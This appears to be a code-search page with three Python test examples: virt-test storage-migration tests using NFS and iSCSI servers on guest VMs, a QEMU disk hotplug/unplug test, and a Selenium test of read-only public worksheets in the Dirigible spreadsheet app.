        cmd = "echo '%s' > /etc/exports" % (share_cfg)
        control_service(session, "nfs-server", "nfs", "stop")
        session.cmd(cmd)
        control_service(session, "nfs-server", "nfs", "start")
        session.cmd("iptables -F")
        session.close()

    def umount(mount_path):
        """
        Unmount the NFS mount_path.

        :param mount_path: Path where the NFS dir is mounted.
        """
        utils.run("umount -f %s" % (mount_path))

    def create_file_disk(dst_path, size):
        """
        Create a file of the given size and create an ext3 filesystem on it.

        :param dst_path: Path to file.
        :param size: Size of file in MB
        """
        utils.run("dd if=/dev/zero of=%s bs=1M count=%s" % (dst_path, size))
        utils.run("mkfs.ext3 -F %s" % (dst_path))

    def mount(disk_path, mount_path, options=None):
        """
        Mount Disk to path

        :param disk_path: Path to disk
        :param mount_path: Path where disk will be mounted.
        :param options: String with options for mount
        """
        if options is None:
            options = ""
        else:
            options = "%s" % options

        utils.run("mount %s %s %s" % (options, disk_path, mount_path))

    def find_disk_vm(vm, disk_serial):
        """
        Find the disk on the vm whose id ends with disk_serial.

        :param vm: VM where to find the disk.
        :param disk_serial: Suffix of the disk id.

        :return: Disk path as a string.
        """
        session = vm.wait_for_login(timeout=login_timeout)

        disk_path = os.path.join("/", "dev", "disk", "by-id")
        disks = session.cmd("ls %s" % disk_path).split("\n")
        session.close()
        disk = filter(lambda x: x.endswith(disk_serial), disks)
        if not disk:
            return None
        return os.path.join(disk_path, disk[0])

    def prepare_disk(vm, disk_path, mount_path):
        """
        Create ext3 on the disk and mount it, so data from the main disk
        can be copied onto it.

        :param vm: VM where to find the disk.
        :param disk_path: Path to the disk in the guest system.
        :param mount_path: Path where the disk will be mounted.
        """
        session = vm.wait_for_login(timeout=login_timeout)
        session.cmd("mkfs.ext3 -F %s" % (disk_path))
        session.cmd("mount %s %s" % (disk_path, mount_path))
        session.close()

    def disk_load(vm, src_path, dst_path, copy_timeout=None, dsize=None):
        """
        Start disk load. Cyclic copy from src_path to dst_path.

        :param vm: VM where to find a disk.
        :param src_path: Source of data
        :param dst_path: Path to destination
        :param copy_timeout: Timeout for copy
        :param dsize: Size of the data block which is periodically copied.
        """
        if dsize is None:
            dsize = 100
        session = vm.wait_for_login(timeout=login_timeout)
        cmd = ("nohup /bin/bash -c 'while true; do dd if=%s of=%s bs=1M "
               "count=%s; done;' 2> /dev/null &" % (src_path, dst_path, dsize))
        pid = re.search(r"\[.+\] (.+)",
                        session.cmd_output(cmd, timeout=copy_timeout))
        return pid.group(1)

    class IscsiServer_tgt(object):

        """
        Class for setting up and starting an iscsi server.
        """

        def __init__(self):
            self.server_name = "autotest_guest_" + test_rand
            self.user = "user1"
            self.passwd = "pass"
            self.config = """
<target %s:dev01>
    backing-store %s
    incominguser %s %s
</target>
"""

        def set_iscsi_server(self, vm_ds, disk_path, disk_size):
            """
            Set up the iscsi server.

            :param vm_ds: VM on which the iscsi server should be started.
            :param disk_path: Path where the backing disk should be placed.
            :param disk_size: Size of the new disk.
            """
            session = vm_ds.wait_for_login(timeout=login_timeout)

            session.cmd("dd if=/dev/zero of=%s bs=1M count=%s" % (disk_path,
                                                                  disk_size))
            status, output = session.cmd_status_output("setenforce 0")
            if status not in [0, 127]:
                logging.warn("setenforce failed:\n%s" % (output))

            config = self.config % (self.server_name, disk_path,
                                    self.user, self.passwd)
            cmd = "cat > /etc/tgt/conf.d/virt.conf << EOF" + config + "EOF"
            control_service(session, "tgtd", "tgtd", "stop")
            session.sendline(cmd)
            control_service(session, "tgtd", "tgtd", "start")
            session.cmd("iptables -F")
            session.close()

        def find_disk(self):
            disk_path = os.path.join("/", "dev", "disk", "by-path")
            disks = utils.run("ls %s" % disk_path).stdout.split("\n")
            disk = filter(lambda x: self.server_name in x, disks)
            if not disk:
                return None
            return os.path.join(disk_path, disk[0].strip())

        def connect(self, vm_ds):
            """
            Connect to the iscsi server on the guest.

            :param vm_ds: Guest where the iscsi server is running.

            :return: Path where the disk is connected.
            """
            ip_dst = vm_ds.get_address()
            utils.run("iscsiadm -m discovery -t st -p %s" % (ip_dst))

            server_ident = ('iscsiadm -m node --targetname "%s:dev01"'
                            ' --portal %s' % (self.server_name, ip_dst))
            utils.run("%s --op update --name node.session.auth.authmethod"
                      " --value CHAP" % (server_ident))
            utils.run("%s --op update --name node.session.auth.username"
                      " --value %s" % (server_ident, self.user))
            utils.run("%s --op update --name node.session.auth.password"
                      " --value %s" % (server_ident, self.passwd))
            utils.run("%s --login" % (server_ident))
            time.sleep(1.0)
            return self.find_disk()

        def disconnect(self):
            server_ident = ('iscsiadm -m node --targetname "%s:dev01"' %
                            (self.server_name))
            utils.run("%s --logout" % (server_ident))

    class IscsiServer(object):

        """
        Iscsi server implementation interface.
        """

        def __init__(self, iscsi_type, *args, **kargs):
            if iscsi_type == "tgt":
                self.ic = IscsiServer_tgt(*args, **kargs)
            else:
                raise NotImplementedError()

        def __getattr__(self, name):
            if self.ic:
                return self.ic.__getattribute__(name)
            raise AttributeError("Cannot find attribute %s in class" % name)

    class test_read_only_dest(MiniSubtest):

        """
        Migration to read-only destination by using a migration to file.

        1) Start guest with NFS server.
        2) Configure the NFS server share as read-only.
        3) Mount the read-only share on the host.
        4) Start a second guest and try to migrate to the read-only dest.

        result) Migration should fail with an error message about the
                read-only destination.
        """

        def test(self):
            if params.get("nettype") != "bridge":
                raise error.TestNAError("Unable to start the test without"
                                        " param nettype=bridge.")

            vm_ds = env.get_vm("virt_test_vm2_data_server")
            vm_guest = env.get_vm("virt_test_vm1_guest")
            ro_timeout = int(params.get("read_only_timeout", "480"))
            exp_str = r".*Read-only file system.*"
            utils.run("mkdir -p %s" % (mount_path))

            vm_ds.verify_alive()
            vm_guest.create()
            vm_guest.verify_alive()

            set_nfs_server(vm_ds, "/mnt *(ro,async,no_root_squash)")

            mount_src = "%s:/mnt" % (vm_ds.get_address())
            mount(mount_src, mount_path,
                  "-o hard,timeo=14,rsize=8192,wsize=8192")
            vm_guest.migrate(mig_timeout, mig_protocol,
                             not_wait_for_migration=True,
                             migration_exec_cmd_src=migration_exec_cmd_src,
                             env=env)

            if not utils_misc.wait_for(lambda: process_output_check(
                                       vm_guest.process, exp_str),
                                       timeout=ro_timeout, first=2):
                raise error.TestFail("The read-only file system warning did"
                                     " not appear within the time limit.")

        def clean(self):
            if os.path.exists(mig_dst):
                os.remove(mig_dst)
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)

    class test_low_space_dest(MiniSubtest):

        """
        Migrate to destination with low space.

        1) Start guest.
        2) Create disk with low space.
        3) Try to migrate to the disk.

        result) Migration should fail with a warning about no space left on
                the device.
        """

        def test(self):
            self.disk_path = None
            while self.disk_path is None or os.path.exists(self.disk_path):
                self.disk_path = ("%s/disk_%s" %
                                  (test.tmpdir, utils.generate_random_string(3)))

            disk_size = utils.convert_data_size(params.get("disk_size", "10M"),
                                                default_sufix='M')
            disk_size /= 1024 * 1024    # To MB.

            exp_str = r".*gzip: stdout: No space left on device.*"
            vm_guest = env.get_vm("virt_test_vm1_guest")
            utils.run("mkdir -p %s" % (mount_path))

            vm_guest.verify_alive()
            vm_guest.wait_for_login(timeout=login_timeout)

            create_file_disk(self.disk_path, disk_size)
            mount(self.disk_path, mount_path, "-o loop")

            vm_guest.migrate(mig_timeout, mig_protocol,
                             not_wait_for_migration=True,
                             migration_exec_cmd_src=migration_exec_cmd_src,
                             env=env)

            if not utils_misc.wait_for(lambda: process_output_check(
                                       vm_guest.process, exp_str),
                                       timeout=60, first=1):
                raise error.TestFail("The migration to destination with low "
                                     "storage space didn't fail as it should.")

        def clean(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)
            if os.path.exists(self.disk_path):
                os.remove(self.disk_path)

    class test_extensive_io(MiniSubtest):

        """
        Abstract class for migration after extensive I/O. This class only
        defines basic functionality and the interface for the other tests.

        1) Start ds_guest which starts data server.
        2) Create disk for data stress in ds_guest.
        3) Share and prepare disk from ds_guest
        6) Mount the disk to mount_path
        7) Create disk for second guest in the mounted path.
        8) Start second guest with prepared disk.
        9) Start stress on the prepared disk on second guest.
        10) Wait a few seconds.
        11) Restart iscsi server.
        12) Migrate second guest.

        result) Migration should be successful.
        """

        def test(self):
            self.copier_pid = None
            if params.get("nettype") != "bridge":
                raise error.TestNAError("Unable to start the test without"
                                        " param nettype=bridge.")

            self.disk_serial = params.get("drive_serial_image2_vm1",
                                          "nfs-disk-image2-vm1")
            self.disk_serial_src = params.get("drive_serial_image1_vm1",
                                              "root-image1-vm1")
            self.guest_mount_path = params.get("guest_disk_mount_path", "/mnt")
            self.copy_timeout = int(params.get("copy_timeout", "1024"))

            self.copy_block_size = params.get("copy_block_size", "100M")
            self.copy_block_size = utils.convert_data_size(
                self.copy_block_size,
                "M")
            self.disk_size = "%s" % (self.copy_block_size * 1.4)
            self.copy_block_size /= 1024 * 1024

            self.server_recover_timeout = (
                int(params.get("server_recover_timeout", "240")))

            utils.run("mkdir -p %s" % (mount_path))

            self.test_params()
            self.config()

            self.vm_guest_params = params.copy()
            self.vm_guest_params["images_base_dir_image2_vm1"] = mount_path
            self.vm_guest_params["image_name_image2_vm1"] = "ni_mount_%s/test" % (test_rand)
            self.vm_guest_params["image_size_image2_vm1"] = self.disk_size
            self.vm_guest_params = self.vm_guest_params.object_params("vm1")
            self.image2_vm_guest_params = (self.vm_guest_params.
                                           object_params("image2"))

            env_process.preprocess_image(test,
                                         self.image2_vm_guest_params,
                                         env)
            self.vm_guest.create(params=self.vm_guest_params)

            self.vm_guest.verify_alive()
            self.vm_guest.wait_for_login(timeout=login_timeout)
            self.workload()

            self.restart_server()

            self.vm_guest.migrate(mig_timeout, mig_protocol, env=env)

            try:
                self.vm_guest.verify_alive()
                self.vm_guest.wait_for_login(timeout=login_timeout)
            except aexpect.ExpectTimeoutError:
                raise error.TestFail("Migration should be successful.")

        def test_params(self):
            """
            Test specific params. Could be implemented in inherited class.
            """
            pass

        def config(self):
            """
            Test specific config.
            """
            raise NotImplementedError()

        def workload(self):
            disk_path = find_disk_vm(self.vm_guest, self.disk_serial)
            if disk_path is None:
                raise error.TestFail("It was impossible to find disk on VM")

            prepare_disk(self.vm_guest, disk_path, self.guest_mount_path)

            disk_path_src = find_disk_vm(self.vm_guest, self.disk_serial_src)
            dst_path = os.path.join(self.guest_mount_path, "test.data")
            self.copier_pid = disk_load(self.vm_guest, disk_path_src, dst_path,
                                        self.copy_timeout, self.copy_block_size)

        def restart_server(self):
            raise NotImplementedError()

        def clean_test(self):
            """
            Test specific cleanup.
            """
            pass

        def clean(self):
            if self.copier_pid:
                try:
                    if self.vm_guest.is_alive():
                        session = self.vm_guest.wait_for_login(timeout=login_timeout)
                        session.cmd("kill -9 %s" % (self.copier_pid))
                except:
                    logging.warn("It was impossible to stop the copier. "
                                 "Something probably happened to the guest "
                                 "or the NFS server.")

            if params.get("kill_vm") == "yes":
                if self.vm_guest.is_alive():
                    self.vm_guest.destroy()
                    utils_misc.wait_for(lambda: self.vm_guest.is_dead(), 30,
                                        2, 2, "Waiting for dying of guest.")
                qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                                mount_path,
                                                None)
                qemu_img.check_image(self.image2_vm_guest_params,
                                     mount_path)

            self.clean_test()

    class test_extensive_io_nfs(test_extensive_io):

        """
        Migrate after extensive io.

        1) Start ds_guest which starts NFS server.
        2) Create disk for data stress in ds_guest.
        3) Share disk over NFS.
        4) Mount the disk to mount_path
        5) Create disk for second guest in the mounted path.
        6) Start second guest with prepared disk.
        7) Start stress on the prepared disk on second guest.
        8) Wait a few seconds.
        9) Restart the NFS server.
        10) Migrate second guest.

        result) Migration should be successful.
        """

        def config(self):
            vm_ds = env.get_vm("virt_test_vm2_data_server")
            self.vm_guest = env.get_vm("vm1")
            self.image2_vm_guest_params = None
            self.copier_pid = None
            self.qemu_img = None

            vm_ds.verify_alive()
            self.control_session_ds = vm_ds.wait_for_login(timeout=login_timeout)

            set_nfs_server(vm_ds, "/mnt *(rw,async,no_root_squash)")

            mount_src = "%s:/mnt" % (vm_ds.get_address())
            mount(mount_src, mount_path,
                  "-o hard,timeo=14,rsize=8192,wsize=8192")

        def restart_server(self):
            time.sleep(10)  # Wait a while until the copy starts working.
            control_service(self.control_session_ds, "nfs-server",
                            "nfs", "stop")  # Stop NFS server
            time.sleep(5)
            control_service(self.control_session_ds, "nfs-server",
                            "nfs", "start")  # Start NFS server

            """
            The touch waits until all previous requests are invalidated
            (NFS grace period). Without the grace period the qemu start
            takes too long and the timers for machine creation die.
            """
            qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                            mount_path,
                                            None)
            utils.run("touch %s" % (qemu_img.image_filename),
                      self.server_recover_timeout)

        def clean_test(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)

    class test_extensive_io_iscsi(test_extensive_io):

        """
        Migrate after extensive io.

        1) Start ds_guest which starts iscsi server.
        2) Create disk for data stress in ds_guest.
        3) Share disk over iscsi.
        4) Join to disk on host.
        5) Prepare partition on the disk.
        6) Mount the disk to mount_path
        7) Create disk for second guest in the mounted path.
        8) Start second guest with prepared disk.
        9) Start stress on the prepared disk on second guest.
        10) Wait a few seconds.
        11) Restart iscsi server.
        12) Migrate second guest.

        result) Migration should be successful.
        """

        def test_params(self):
            self.iscsi_variant = params.get("iscsi_variant", "tgt")
            self.ds_disk_path = os.path.join(self.guest_mount_path, "test.img")

        def config(self):
            vm_ds = env.get_vm("virt_test_vm2_data_server")
            self.vm_guest = env.get_vm("vm1")
            self.image2_vm_guest_params = None
            self.copier_pid = None
            self.qemu_img = None

            vm_ds.verify_alive()
            self.control_session_ds = vm_ds.wait_for_login(timeout=login_timeout)

            self.isci_server = IscsiServer("tgt")
            disk_path = os.path.join(self.guest_mount_path, "disk1")
            self.isci_server.set_iscsi_server(vm_ds, disk_path,
                                              (int(float(self.disk_size) * 1.1) / (1024 * 1024)))
            self.host_disk_path = self.isci_server.connect(vm_ds)

            utils.run("mkfs.ext3 -F %s" % (self.host_disk_path))
            mount(self.host_disk_path, mount_path)

        def restart_server(self):
            time.sleep(10)  # Wait a while until the copy starts working.
            control_service(self.control_session_ds, "tgtd",
                            "tgtd", "stop", 240)  # Stop Iscsi server
            time.sleep(5)
            control_service(self.control_session_ds, "tgtd",
                            "tgtd", "start", 240)  # Start Iscsi server

            """
            Wait until the iscsi server is accessible again after the
            restart.
            """
            qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                            mount_path,
                                            None)
            utils.run("touch %s" % (qemu_img.image_filename),
                      self.server_recover_timeout)

        def clean_test(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)
            if os.path.exists(self.host_disk_path):
                self.isci_server.disconnect()

    test_type = params.get("test_type")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " migration_with_dst_problem test" % test_type)

Example 11

View license
@error.context_aware
def run(test, params, env):
    """
    This tests the disk hotplug/unplug functionality.
    1) prepares multiple disks to be hotplugged
    2) hotplugs them
    3) verifies that they are in qtree/guest system/...
    4) stop I/O stress_cmd
    5) unplugs them
    6) continue I/O stress_cmd
    7) verifies they are not in qtree/guest system/...
    8) repeats $repeat_times

    :param test: QEMU test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.
    """
    def verify_qtree(params, info_qtree, info_block, proc_scsi, qdev):
        """
        Verifies that params, info qtree, info block and /proc/scsi/ matches
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :param info_qtree: Output of "info qtree" monitor command
        :type info_qtree: string
        :param info_block: Output of "info block" monitor command
        :type info_block: dict of dicts
        :param proc_scsi: Output of "/proc/scsi/scsi" guest file
        :type proc_scsi: string
        :param qdev: qcontainer representation
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        """
        err = 0
        qtree = qemu_qtree.QtreeContainer()
        qtree.parse_info_qtree(info_qtree)
        disks = qemu_qtree.QtreeDisksContainer(qtree.get_nodes())
        (tmp1, tmp2) = disks.parse_info_block(info_block)
        err += tmp1 + tmp2
        err += disks.generate_params()
        err += disks.check_disk_params(params)
        (tmp1, tmp2, _, _) = disks.check_guests_proc_scsi(proc_scsi)
        err += tmp1 + tmp2
        if err:
            logging.error("info qtree:\n%s", info_qtree)
            logging.error("info block:\n%s", info_block)
            logging.error("/proc/scsi/scsi:\n%s", proc_scsi)
            logging.error(qdev.str_bus_long())
            raise error.TestFail("%s errors occurred while verifying"
                                 " qtree vs. params" % err)

    def insert_into_qdev(qdev, param_matrix, no_disks, params, new_devices):
        """
        Inserts no_disks disks int qdev using randomized args from param_matrix
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param param_matrix: Matrix of randomizable params
        :type param_matrix: list of lists
        :param no_disks: Desired number of disks
        :type no_disks: integer
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :return: (newly added devices, number of added disks)
        :rtype: tuple(list, integer)
        """
        dev_idx = 0
        _new_devs_fmt = ""
        _formats = param_matrix.pop('fmt', [params.get('drive_format')])
        formats = _formats[:]
        if len(new_devices) == 1:
            strict_mode = None
        else:
            strict_mode = True
        i = 0
        while i < no_disks:
            # Set the format
            if len(formats) < 1:
                if i == 0:
                    raise error.TestError("Fail to add any disks, probably bad"
                                          " configuration.")
                logging.warn("Can't create desired number '%s' of disk types "
                             "'%s'. Using '%d' no disks.", no_disks,
                             _formats, i)
                break
            name = 'stg%d' % i
            args = {'name': name, 'filename': stg_image_name % i}
            fmt = random.choice(formats)
            if fmt == 'virtio_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'virtio-scsi-pci'
            elif fmt == 'lsi_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'lsi53c895a'
            elif fmt == 'spapr_vscsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'spapr-vscsi'
            else:
                args['fmt'] = fmt
            # Other params
            for key, value in param_matrix.iteritems():
                args[key] = random.choice(value)

            try:
                devs = qdev.images_define_by_variables(**args)
                # parallel test adds devices in mixed order, force bus/addrs
                qdev.insert(devs, strict_mode)
            except utils.DeviceError:
                for dev in devs:
                    if dev in qdev:
                        qdev.remove(dev, recursive=True)
                formats.remove(fmt)
                continue

            params = convert_params(params, args)
            env_process.preprocess_image(test, params.object_params(name),
                                         name)
            new_devices[dev_idx].extend(devs)
            dev_idx = (dev_idx + 1) % len(new_devices)
            _new_devs_fmt += "%s(%s) " % (name, fmt)
            i += 1
        if _new_devs_fmt:
            logging.info("Using disks: %s", _new_devs_fmt[:-1])
        param_matrix['fmt'] = _formats
        return new_devices, params

    def _hotplug(new_devices, monitor, prefix=""):
        """
        Do the actual hotplug of the new_devices using monitor monitor.
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        hotplug_outputs = []
        hotplug_sleep = float(params.get('wait_between_hotplugs', 0))
        for device in new_devices:      # Hotplug all devices
            time.sleep(hotplug_sleep)
            hotplug_outputs.append(device.hotplug(monitor))
        time.sleep(hotplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in new_devices:      # Verify the hotplug status
            out = hotplug_outputs.pop(0)
            out = device.verify_hotplug(out, monitor)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))
        if not failed and not unverif:
            logging.debug("%sAll hotplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sHotplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sHotplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sHotplug of some devices failed." % prefix)

    def hotplug_serial(new_devices, monitor):
        _hotplug(new_devices[0], monitor)

    def hotplug_parallel(new_devices, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_hotplug, name=name[:-2],
                                      args=(new_devices[i], monitors[i], name))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def _postprocess_images():
        # remove and check the images
        _disks = []
        for disk in params['images'].split(' '):
            if disk.startswith("stg"):
                env_process.postprocess_image(test, params.object_params(disk),
                                              disk)
            else:
                _disks.append(disk)
            params['images'] = " ".join(_disks)

    def _unplug(new_devices, qdev, monitor, prefix=""):
        """
        Do the actual unplug of new_devices using monitor monitor
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        unplug_sleep = float(params.get('wait_between_unplugs', 0))
        unplug_outs = []
        unplug_devs = []
        for device in new_devices[::-1]:    # unplug all devices
            if device in qdev:  # Some devices are removed with previous one
                time.sleep(unplug_sleep)
                unplug_devs.append(device)
                unplug_outs.append(device.unplug(monitor))
                # Remove from qdev even when unplug failed because further in
                # this test we compare VM with qdev, which should be without
                # these devices. We can do this because we already set the VM
                # as dirty.
                if LOCK:
                    LOCK.acquire()
                qdev.remove(device)
                if LOCK:
                    LOCK.release()
        time.sleep(unplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in unplug_devs:          # Verify unplugs
            _out = unplug_outs.pop(0)
            # The unplug effect can be delayed because it waits for the OS
            # response before removing the device from the qtree (a bounded
            # retry sketch follows this example).
            for _ in xrange(50):
                out = device.verify_unplug(_out, monitor)
                if out is True:
                    break
                time.sleep(0.1)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))

        if not failed and not unverif:
            logging.debug("%sAll unplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sUnplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sUnplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sUnplug of some devices failed." % prefix)

    def unplug_serial(new_devices, qdev, monitor):
        _unplug(new_devices[0], qdev, monitor)

    def unplug_parallel(new_devices, qdev, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_unplug,
                                      args=(new_devices[i], qdev, monitors[i]))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def verify_qtree_unsupported(params, info_qtree, info_block, proc_scsi,
                                 qdev):
        return logging.warn("info qtree not supported. Can't verify qtree vs. "
                            "guest disks.")

    vm = env.get_vm(params['main_vm'])
    qdev = vm.devices
    session = vm.wait_for_login(timeout=int(params.get("login_timeout", 360)))
    out = vm.monitor.human_monitor_cmd("info qtree", debug=False)
    if "unknown command" in str(out):
        verify_qtree = verify_qtree_unsupported

    stg_image_name = params['stg_image_name']
    if not stg_image_name[0] == "/":
        stg_image_name = "%s/%s" % (data_dir.get_data_dir(), stg_image_name)
    stg_image_num = int(params['stg_image_num'])
    stg_params = params.get('stg_params', '').split(' ')
    i = 0
    while i < len(stg_params) - 1:
        if not stg_params[i].strip():
            i += 1
            continue
        if stg_params[i][-1] == '\\':
            stg_params[i] = '%s %s' % (stg_params[i][:-1],
                                       stg_params.pop(i + 1))
        i += 1

    param_matrix = {}
    for i in xrange(len(stg_params)):
        if not stg_params[i].strip():
            continue
        (cmd, parm) = stg_params[i].split(':', 1)
        # ',' separated list of values
        parm = parm.split(',')
        j = 0
        while j < len(parm) - 1:
            if parm[j][-1] == '\\':
                parm[j] = '%s,%s' % (parm[j][:-1], parm.pop(j + 1))
            j += 1

        param_matrix[cmd] = parm

    # Modprobe the module if specified in config file
    module = params.get("modprobe_module")
    if module:
        session.cmd("modprobe %s" % module)

    stress_cmd = params.get('stress_cmd')
    if stress_cmd:
        funcatexit.register(env, params.get('type'), stop_stresser, vm,
                            params.get('stress_kill_cmd'))
        stress_session = vm.wait_for_login(timeout=10)
        for _ in xrange(int(params.get('no_stress_cmds', 1))):
            stress_session.sendline(stress_cmd)

    rp_times = int(params.get("repeat_times", 1))
    queues = params.get("multi_disk_type") == "parallel"
    if queues:  # parallel
        queues = xrange(len(vm.monitors))
        hotplug = hotplug_parallel
        unplug = unplug_parallel
        monitor = vm.monitors
        global LOCK
        LOCK = threading.Lock()
    else:   # serial
        queues = xrange(1)
        hotplug = hotplug_serial
        unplug = unplug_serial
        monitor = vm.monitor
    context_msg = "Running sub test '%s' %s"
    error.context("Verify disk before test", logging.info)
    info_qtree = vm.monitor.info('qtree', False)
    info_block = vm.monitor.info_block(False)
    proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
    verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
    for iteration in xrange(rp_times):
        error.context("Hotplugging/unplugging devices, iteration %d"
                      % iteration, logging.info)
        sub_type = params.get("sub_type_before_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Insert devices into qdev", logging.debug)
        qdev.set_dirty()
        new_devices = [[] for _ in queues]
        new_devices, params = insert_into_qdev(qdev, param_matrix,
                                               stg_image_num, params,
                                               new_devices)

        error.context("Hotplug the devices", logging.debug)
        hotplug(new_devices, monitor)
        time.sleep(float(params.get('wait_after_hotplug', 0)))

        error.context("Verify disks after hotplug", logging.debug)
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        qdev.set_clean()

        sub_type = params.get("sub_type_after_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        sub_type = params.get("sub_type_before_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Unplug and remove the devices", logging.debug)
        if stress_cmd:
            session.cmd(params["stress_stop_cmd"])
        unplug(new_devices, qdev, monitor)
        if stress_cmd:
            session.cmd(params["stress_cont_cmd"])
        _postprocess_images()

        error.context("Verify disks after unplug", logging.debug)
        time.sleep(float(params.get('wait_after_unplug', 0)))
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        # we verified the unplugs, set the state to 0
        for _ in xrange(qdev.get_state()):
            qdev.set_clean()

        sub_type = params.get("sub_type_after_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

    # Check for various KVM failures
    error.context("Validating VM after all disk hotplug/unplugs",
                  logging.debug)
    vm.verify_alive()
    out = session.cmd_output('dmesg')
    if "I/O error" in out:
        logging.warn(out)
        raise error.TestWarn("I/O error messages occured in dmesg, check"
                             "the log for details.")

Example 12

View license
    def test_public_worksheets_visible_readonly_and_copiable_for_others(self):
        # * Harold logs in and creates a new sheet
        sheet_id = self.login_and_create_new_sheet()

        # * He gives the sheet a catchy name
        self.set_sheet_name('spaceshuttle')

        # * He enters some formulae n stuff
        self.enter_cell_text(2, 3, '23')
        self.enter_cell_text(2, 4, '=my_add_function(B3)')
        self.prepend_usercode('my_add_function = lambda x : x + 2')
        self.wait_for_cell_value(2, 4, '25')

        # * He notes that the tooltip for the security icon indicates that the
        # sheet is private
        self.waitForButtonToIndicateSheetIsPublic(False)

        # * He clicks on the security icon
        self.selenium.click('id=id_security_button')

        # He sees a tickbox, currently unticked, saying make worksheet public
        self.wait_for_element_visibility(
                'id=id_security_form', True)
        self.wait_for_element_visibility(
                'id=id_security_form_public_sheet_checkbox', True)

        self.assertEquals(
            self.selenium.get_value('id=id_security_form_public_sheet_checkbox'),
            'off'
        )
        # He ticks it and dismisses the dialog
        self.selenium.click('id=id_security_form_public_sheet_checkbox')
        self.selenium.click('id=id_security_form_ok_button')

        # * He notes that the tooltip for the security icon indicates that the
        # sheet is public
        self.waitForButtonToIndicateSheetIsPublic(True)

        # He notes down the URL and emails it to his colleague Harriet
        harolds_url = self.browser.current_url

        # He logs out
        self.logout()

        # * Later on, Harriet logs into teh Dirigible and heads on over to
        #   Harold's spreadsheet
        self.login(self.get_my_usernames()[1])
        self.go_to_url(harolds_url)

        # She sees the values n stuff
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # * She notices that all toolbar icons are missing,
        # apart from download-as-csv
        map(
            lambda e: self.wait_for_element_presence(e, False),
            [
                'id=id_import_button',
                'id=id_cut_button',
                'id=id_copy_button',
                'id=id_paste_button',
                'id=id_security_button',
            ]
        )
        self.wait_for_element_visibility('id=id_export_button', True)

        # * She tries to edit some formulae, but can't
        self.selenium.double_click(
                self.get_cell_locator(1, 1)
        )
        self.selenium.focus(
                self.get_cell_locator(1, 1)
        )
        time.sleep(1)
        self.wait_for_element_presence(
                self.get_active_cell_editor_locator(),
                False
        )

        # * she tries to edit the cell again, using the formula bar, but cannot
